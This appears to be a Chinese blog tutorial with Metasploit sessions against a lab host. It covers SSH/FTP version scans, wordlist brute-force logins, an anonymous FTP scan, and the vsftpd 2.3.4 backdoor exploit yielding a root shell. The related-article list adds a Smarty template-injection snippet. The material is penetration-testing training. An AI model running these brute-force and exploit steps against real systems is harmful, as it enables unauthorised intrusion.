红队/白帽必经之路(16)——如何用Metasploit 在边路进行信息刺探及爆破登录[既然是红队,那就对自己狠一点!!!]

欢迎各位彦祖与热巴畅游本人专栏与博客

你的三连是我最大的动力

以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]

专栏跑道一

➡️网络空间安全——全栈前沿技术持续深入学习 


专栏跑道二


➡️ 24 Network Security -LJS 

​ 

专栏跑道三


 ➡️ MYSQL REDIS Advance operation

专栏跑道四

➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]

专栏跑道五


➡️RHCE-LJS[Linux高端骚操作实战篇]

专栏跑道六

➡️数据结构与算法[考研+实际工作应用+C程序设计]

专栏跑道七

➡️RHCSA-LJS[Linux初级及进阶骚技能]

上节回顾

目录

欢迎各位彦祖与热巴畅游本人专栏与博客

你的三连是我最大的动力

以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]

专栏跑道一

➡️网络空间安全——全栈前沿技术持续深入学习 

专栏跑道二

➡️ 24 Network Security -LJS 

专栏跑道三

 ➡️ MYSQL REDIS Advance operation

专栏跑道四

➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]

专栏跑道五

➡️RHCE-LJS[Linux高端骚操作实战篇]​编辑​

专栏跑道六

➡️数据结构与算法[考研+实际工作应用+C程序设计]

专栏跑道七

➡️RHCSA-LJS[Linux初级及进阶骚技能]

上节回顾

 1.基于 SSH 协议收集信息

查看 ssh 服务的版本信息

SSH 暴力破解

注意:

​ 回到 MSF 终端

2.基于 FTP 协议收集信息

2.1查看 ftp 服务的版本信息

加载 ftp 服务版本扫描模块

查看设置参数

设置目标 IP,可以设置多个

执行扫描,输入 exploit 或 run

退出

扫描出 ftp 服务的版本号,我们可以尝试搜索版本号,看看有没有可以利用的模块[或者搜索 vsftpd]

所以尝试利用下这个模块

拿到了 shell,而且是 root 权限,那么尝试执行下命令

执行 id 命令, 查看当前用户

执行 ifconfig 命令,查看 IP 地址

2.2 ftp 匿名登录扫描[直接肝就完事了]

2.3 ftp 暴力破解

不同于SSH暴力破解的唯一一步:ftp漏洞的模块利用

最后run一下即可​编辑​编辑


 1.基于 SSH 协议收集信息


查看 ssh 服务的版本信息

┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# msfconsole 
Metasploit tip: Tired of setting RHOSTS for modules? Try globally setting it 
with setg RHOSTS x.x.x.xIIIIII    dTb.dTb        _.---._II     4'  v  'B   .'"".'/|\`.""'.II     6.     .P  :  .' / | \ `.  :II     'T;. .;P'  '.'  /  |  \  `.'II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'I love shells --egypt=[ metasploit v6.3.55-dev                          ]
+ -- --=[ 2397 exploits - 1232 auxiliary - 422 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]Metasploit Documentation: https://docs.metasploit.com/msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > show options                                           Module options (auxiliary/scanner/ssh/ssh_version):                                              Name     Current Setting  Required  Description                                               ----     ---------------  --------  -----------                                               RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs  /using-metasploit/basics/using-metasploit.html            RPORT    22               yes       The target port (TCP)                                     THREADS  1                yes       The number of concurrent threads (max one per host)TIMEOUT  30               yes       Timeout for the SSH probeView the full module info with the info, or info -d command.msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 auxiliary(scanner/ssh/ssh_version) > run

SSH 暴力破解

msf6 auxiliary(scanner/ssh/ssh_version) > back
msf6 >  use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) >  show optionsModule options (auxiliary/scanner/ssh/ssh_login):Name              Current Setting  Required  Description----              ---------------  --------  -----------ANONYMOUS_LOGIN   false            yes       Attempt to login with a blank username and passwordBLANK_PASSWORDS   false            no        Try blank passwords for all usersBRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5DB_ALL_CREDS      false            no        Try each user/password couple stored in the current databaseDB_ALL_PASS       false            no        Add all passwords in the current database to the listDB_ALL_USERS      false            no        Add all users in the current database to the listDB_SKIP_EXISTING  none             no        Skip existing credentials stored in the currentdatabase (Accepted: none, user, user&realm)PASSWORD                           no        A specific password to authenticate withPASS_FILE                          no        File containing passwords, one per lineRHOSTS                             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT             22               yes       The target portSTOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a hostTHREADS           1                yes       The number of concurrent threads (max one per host)USERNAME                           no        A specific username to authenticate asUSERPASS_FILE                      no        File containing users and passwords separated by space, one pair per lineUSER_AS_PASS      false            no        Try the username as the password for all usersUSER_FILE                          no        File containing usernames, one per lineVERBOSE           false            yes       Whether to print output for all attemptsView the full module info with the info, or info -d command.msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt                                                                        
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt  

  • 因为字典文件中不包含我们的用户密码信息我们把自己的密码信息手动加入进去以便展示效果新开一个终端窗口
  • 设置字典文件默认的字典文件是不满足实际需求的后期我们使用更强大的字典文件。
  • 注意:

  • 先添加如下用户密码文件,之后在重新试一次即可

 

──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# echo "msfadmin msfadmin" >> /usr/share/metasploitframework/data/wordlists/root_userpass.txt

 回到 MSF 终端

msf6 auxiliary(scanner/ssh/ssh_login) > run

 

2.基于 FTP 协议收集信息

2.1查看 ftp 服务的版本信息

加载 ftp 服务版本扫描模块

msf6 auxiliary(scanner/ssh/ssh_login) > back
msf6 > use auxiliary/scanner/ftp/ftp_version

查看设置参数

msf6 auxiliary(scanner/ftp/ftp_version) > show optionsModule options (auxiliary/scanner/ftp/ftp_version):Name     Current Setting      Required  Description----     ---------------      --------  -----------FTPPASS  mozilla@example.com  no        The password for the specified usernameFTPUSER  anonymous            no        The username to authenticate asRHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT    21                   yes       The target port (TCP)THREADS  1                    yes       The number of concurrent threads (max one per host)View the full module info with the info, or info -d command.

设置目标 IP,可以设置多个

msf6 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.1.180

执行扫描,输入 exploit 或 run

msf6 auxiliary(scanner/ftp/ftp_version) > run

  • 我们可以发现:扫描出结果是:vsFTPd 2.3.4 

退出

msf6 auxiliary(scanner/ftp/ftp_version) > back
msf6 > 

扫描出 ftp 服务的版本号,我们可以尝试搜索版本号,看看有没有可以利用的模块[或者搜索 vsftpd]

msf6 >  search 2.3.4Matching Modules
================#  Name                                                      Disclosure Date  Rank       Check  Description-  ----                                                      ---------------  ----       -----  -----------0  exploit/multi/http/struts2_namespace_ognl                 2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection1  auxiliary/gather/teamtalk_creds                                            normal     No     TeamTalk Gather Credentials2  exploit/unix/ftp/vsftpd_234_backdoor                      2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution3  exploit/unix/http/zivif_ipcheck_exec                      2017-09-01       excellent  Yes    Zivif Camera iptest.cgi Blind Remote Command Execution4  exploit/multi/http/oscommerce_installer_unauth_code_exec  2018-04-30       excellent  Yes    osCommerce Installer Unauthenticated Code ExecutionInteract with a module by name or index. For example info 4, use 4 or use exploit/multi/http/oscommerce_installer_unauth_code_exec                                                                msf6 > search vsftpdMatching Modules
================#  Name                                  Disclosure Date  Rank       Check  Description-  ----                                  ---------------  ----       -----  -----------0  auxiliary/dos/ftp/vsftpd_232          2011-02-03       normal     Yes    VSFTPD 2.3.2 Denial of Service1  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command ExecutionInteract with a module by name or index. For example info 1, use 1 or use exploit/unix/ftp/vsftpd_234_backdoor                                                                                    msf6 > 

 

  • 发现存在一个 exploit 模块,而且这个版本的 ftp 服务存在一个后门

所以尝试利用下这个模块

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show optionsModule options (exploit/unix/ftp/vsftpd_234_backdoor):Name     Current Setting  Required  Description----     ---------------  --------  -----------CHOST                     no        The local client addressCPORT                     no        The local client portProxies                   no        A proxy chain of format type:host:port[,type:host:port][...]RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT    21               yes       The target port (TCP)Payload options (cmd/unix/interact):Name  Current Setting  Required  Description----  ---------------  --------  -----------Exploit target:Id  Name--  ----0   AutomaticView the full module info with the info, or info -d command.msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

拿到了 shell,而且是 root 权限,那么尝试执行下命令

执行 id 命令, 查看当前用户

执行 ifconfig 命令,查看 IP 地址

2.2 ftp 匿名登录扫描[直接肝就完事了]

  • 其实就是利用了漏洞模块罢了
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > back
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) > show optionsModule options (auxiliary/scanner/ftp/anonymous):Name     Current Setting      Required  Description----     ---------------      --------  -----------FTPPASS  mozilla@example.com  no        The password for the specified usernameFTPUSER  anonymous            no        The username to authenticate asRHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT    21                   yes       The target port (TCP)THREADS  1                    yes       The number of concurrent threads (max one per host)View the full module info with the info, or info -d command.msf6 auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 auxiliary(scanner/ftp/anonymous) > run

2.3 ftp 暴力破解

  • 不同于SSH暴力破解的唯一一步:ftp漏洞的模块利用

    msf6 auxiliary(scanner/ftp/anonymous) > back
    msf6 >  use auxiliary/scanner/ftp/ftp_login
    

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > back
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) > show optionsModule options (auxiliary/scanner/ftp/anonymous):Name     Current Setting      Required  Description----     ---------------      --------  -----------FTPPASS  mozilla@example.com  no        The password for the specified usernameFTPUSER  anonymous            no        The username to authenticate asRHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT    21                   yes       The target port (TCP)THREADS  1                    yes       The number of concurrent threads (max one per host)View the full module info with the info, or info -d command.msf6 auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 auxiliary(scanner/ftp/anonymous) > back
msf6 >  use auxiliary/scanner/ftp/ftp_login
msf6 auxiliary(scanner/ftp/ftp_login) > show optionsModule options (auxiliary/scanner/ftp/ftp_login):Name              Current Setting  Required  Description----              ---------------  --------  -----------ANONYMOUS_LOGIN   false            yes       Attempt to login with a blank username and passwordBLANK_PASSWORDS   false            no        Try blank passwords for all usersBRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5DB_ALL_CREDS      false            no        Try each user/password couple stored in the current databaseDB_ALL_PASS       false            no        Add all passwords in the current database to the listDB_ALL_USERS      false            no        Add all users in the current database to the listDB_SKIP_EXISTING  none             no        Skip existing credentials stored in the currentdatabase (Accepted: none, user, user&realm)PASSWORD                           no        A specific password to authenticate withPASS_FILE                          no        File containing passwords, one per lineProxies                            no        A proxy chain of format type:host:port[,type:host:port][...]RECORD_GUEST      false            no        Record anonymous/guest logins to the databaseRHOSTS                             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT             21               yes       The target port (TCP)STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a hostTHREADS           1                yes       The number of concurrent threads (max one per host)USERNAME                           no        A specific username to authenticate asUSERPASS_FILE                      no        File containing users and passwords separated by space, one pair per lineUSER_AS_PASS      false            no        Try the username as the password for all usersUSER_FILE                          no        File containing usernames, one per lineVERBOSE           true             yes       Whether to print output for all attemptsView the full module info with the info, or info -d command.msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

最后run一下即可

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/482889.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

vue实现echarts饼图自动轮播

echarts官网:Examples - Apache ECharts echartsFn.ts 把echarts函数封装成一个文件 import * as echarts from "echarts";const seriesData [{"value": 12,"name": "过流报警"},{"value": 102,"name&qu…

C++之异常智能指针其他

C之异常&智能指针&其他 异常关于函数异常声明异常的优劣 智能指针auto_ptrunique_ptrshared_ptrweak_ptr定制删除器 智能指针的历史与boost库 特殊类单例模式饿汉和懒汉的优缺点 C四种类型转换CIO流结语 异常 try括起来的的代码块中可能有throw一个异常(可…

混沌工程/混沌测试/云原生测试/云平台测试

背景 私有云/公有云/混合云等具有复杂,分布式,环境多样性等特点,许多特殊场景引发的线上问题很难被有效发现。所以需要引入混沌工程,建立对系统抵御生产环境中失控条件的能力以及信心,提高系统面对未知风险得能力。 …

Hive学习基本概念

基本概念 hive是什么? Facebook 开源,用于解决海量结构化日志的数据统计。 基于Hadoop的一个数据仓库工具,可以将结构化的数据文件映射为一张表,并提供类SQL查询功能 本质是将HQL转化为MapReduce程序。 Hive处理的数据存储在H…

数据分析流程中的Lambda架构,以及数据湖基于Hadoop、Spark的实现

文章目录 一、Lambda架构1、Lambda的三层架构2、简单解释:3、Lambda架构的优缺点 二、数据湖基于Hadoop、Spark的实现1、架构2、数据管理(存储层的辅助功能) 一、Lambda架构 1、Lambda的三层架构 Batch View(批处理视图层&#…

算法笔记:力扣142.环形链表返回链表入口

该题目通俗来说就是需要返回节点的入口,这点与判断是否有环不同,有环是通过快慢指针的形式来判断,但当快慢指针相等的时候,此时的节点不一定是环的入口节点。所以这题需要注意。 关键API: map.putIfAbsent(key,value)…

医院管理系统

私信我获取源码和万字论文,制作不易,感谢点赞支持。 医院管理系统 摘要 随着信息互联网信息的飞速发展,医院也在创建着属于自己的管理系统。本文介绍了医院管理系统的开发全过程。通过分析企业对于医院管理系统的需求,创建了一个计…

说说Elasticsearch查询语句如何提升权重?

大家好,我是锋哥。今天分享关于【说说Elasticsearch查询语句如何提升权重?】面试题。希望对大家有帮助; 说说Elasticsearch查询语句如何提升权重? 1000道 互联网大厂Java工程师 精选面试题-Java资源分享网 在 Elasticsearch 中&…

【Spring Security框架解析】

文章目录 Spring-security介绍Spring-security认证授权流程认证流程Security流程认证过滤器实现获取UserDetail信息 配置Security Spring-security介绍 Spring Security是一个功能强大且高度可定制的Java安全框架,用于保护基于Spring的应用程序。它提供了全面的安全…

[CISCN 2019华东南]Web11

[CISCN 2019华东南]Web11 给了两个链接但是都无法访问 这里我们直接抓包试一下 我们插入X-Forwarded-For:127.0.0.1 发现可以修改了右上角的IP地址,从而可以进行注入 {$smarty.version} 查看版本号 if标签执行PHP命令 {if phpinfo()}{/if} 查看协议 {if system(…

使用SpringBoot实现邮件发送(QQ邮箱为例)

使用SpringBoot实现邮件发送(QQ邮箱为例) 一、获取授权码 1.首先进入qq邮箱找到设置 2、账号栏目,找到POP3/SMTP服务 并开启服务 3、获取授权码 二、SpringBoot集成邮件发送 1.创建邮件发送服务类 package com.example.demo.service;import org.springframework…

hint: Updates were rejected because the tip of your current branch is behind!

问题 本地仓库往远段仓库推代码时候提示: error: failed to push some refs to 192.168.2.1:java-base/java-cloud.git hint: Updates were rejected because the tip of your current branch is behind! refs/heads/master:refs/heads/master [rejected] (…

基于BM1684的AI边缘服务器-模型转换,大模型一体机(二)

目标追踪 注:所有模型转换都是在docker环境中的 先进入docker 这里我们是要在docker环境里编译的,所以先进入docker :~/tpu-nntc# docker run -v $PWD/:/workspace -it sophgo/tpuc_dev:latest初始化环境 root2bb02a2e27d5:/workspace/tpu-nntc# s…

ROS基本框架2——在ROS开发中创建并使用自定义消息(C++版本)

ROS基本框架2——在ROS开发中创建并使用自定义消息(C++版本) code review! 参考笔记 1.ROS基本框架1——编写简单的发布者和订阅者(C++和Python版本) 2.ROS基本框架2——在ROS开发中创建并使用自定义消息(C++版本) 文章目录 ROS基本框架2——在ROS开发中创建并使用自定义…

实例讲解MATLAB绘图坐标轴标签旋转

在进行绘图时需要在图片上添加上做标轴的标签,但是当数据量比较多时,例如一天24小时的数据,这时把每个小时显示在左边轴的标签上,文字内容放不下,因此需要将坐标轴标签旋转一定的角度,这样可以更好在图形上…

Spark 内存管理机制

Spark 内存管理 堆内内存和堆外内存 作为一个 JVM 进程,Executor 的内存管理建立在 JVM(最小为六十四分之一,最大为四分之一)的内存管理之上,此外spark还引入了堆外内存(不在JVM中的内存),在spark中是指不…

为什么爱用低秩矩阵

目录 为什么爱用低秩矩阵 一、定义与性质 二、区别与例子 为什么爱用低秩矩阵 我们更多地提及低秩分解而非满秩分解,主要是因为低秩分解在数据压缩、噪声去除、模型简化和特征提取等方面具有显著的优势。而满秩分解虽然能够保持数据的完整性,但在实际应用中的场景较为有限…

Dify+Docker

1. 获取代码 直接下载 (1)访问 langgenius/dify: Dify is an open-source LLM app development platform. Difys intuitive interface combines AI workflow, RAG pipeline, agent capabilities, model management, observability features and more, …

Android Studio的AI工具插件使用介绍

Android Studio的AI工具插件使用介绍 一、前言 Android Studio 的 AI 工具插件具有诸多重要作用,以下是一些常见的方面: 代码生成与自动补全 代码优化与重构 代码解读 学习与知识获取 智能搜索与资源推荐实际使用中可以添加注释,解读某段代…

DOCKER学习总结

这里写目录标题 一、Docker安装1.1 在线安装1.2 离线安装安装配置启动服务 1.3 配置镜像1.4 Docker启动相关命令 二、Docker三大核心概念2.1 镜像2.2 容器2.3 仓库2.3.1 公有仓库2.3.2 私有仓库 二、容器与虚拟机比较 一、Docker安装 1.1 在线安装 查看是否安装dockeryum lis…